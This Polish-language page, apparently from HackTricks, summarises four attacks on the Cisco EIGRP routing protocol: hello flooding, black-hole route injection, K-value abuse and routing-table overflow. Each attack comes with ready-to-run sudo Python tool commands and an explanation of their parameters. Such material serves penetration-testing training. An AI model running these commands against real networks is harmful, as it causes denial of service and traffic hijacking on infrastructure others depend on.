Ataki EIGRP

Reading time: 2 minutes

tip

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks

To jest podsumowanie ataków opisanych w https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Sprawdź to, aby uzyskać więcej informacji.

Atak fałszywych sąsiadów EIGRP

  • Cel: Przeciążenie CPU routera poprzez zalewanie go pakietami EIGRP hello, co może prowadzić do ataku Denial of Service (DoS).
  • Narzędzie: helloflooding.py skrypt.
  • Wykonanie: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
  • Parametry:
  • --interface: Określa interfejs sieciowy, np. eth0.
  • --as: Definiuje numer autonomicznego systemu EIGRP, np. 1.
  • --subnet: Ustala lokalizację podsieci, np. 10.10.100.0/24.

Atak czarnej dziury EIGRP

  • Cel: Zakłócenie przepływu ruchu sieciowego poprzez wstrzyknięcie fałszywej trasy, prowadząc do czarnej dziury, gdzie ruch jest kierowany do nieistniejącego celu.
  • Narzędzie: routeinject.py skrypt.
  • Wykonanie: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
  • Parametry:
  • --interface: Określa interfejs systemu atakującego.
  • --as: Definiuje numer AS EIGRP.
  • --src: Ustala adres IP atakującego.
  • --dst: Ustala adres IP docelowej podsieci.
  • --prefix: Definiuje maskę adresu IP docelowej podsieci.

Atak nadużywania wartości K

  • Cel: Tworzenie ciągłych zakłóceń i ponownych połączeń w obrębie domeny EIGRP poprzez wstrzykiwanie zmienionych wartości K, co skutkuje atakiem DoS.
  • Narzędzie: relationshipnightmare.py skrypt.
  • Wykonanie: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
  • Parametry:
  • --interface: Określa interfejs sieciowy.
  • --as: Definiuje numer AS EIGRP.
  • --src: Ustala adres IP legalnego routera.

Atak przepełnienia tabeli routingu

  • Cel: Obciążenie CPU i RAM routera poprzez zalewanie tabeli routingu licznymi fałszywymi trasami.
  • Narzędzie: routingtableoverflow.py skrypt.
  • Wykonanie: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
  • Parametry:
  • --interface: Określa interfejs sieciowy.
  • --as: Definiuje numer AS EIGRP.
  • --src: Ustala adres IP atakującego.

tip

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks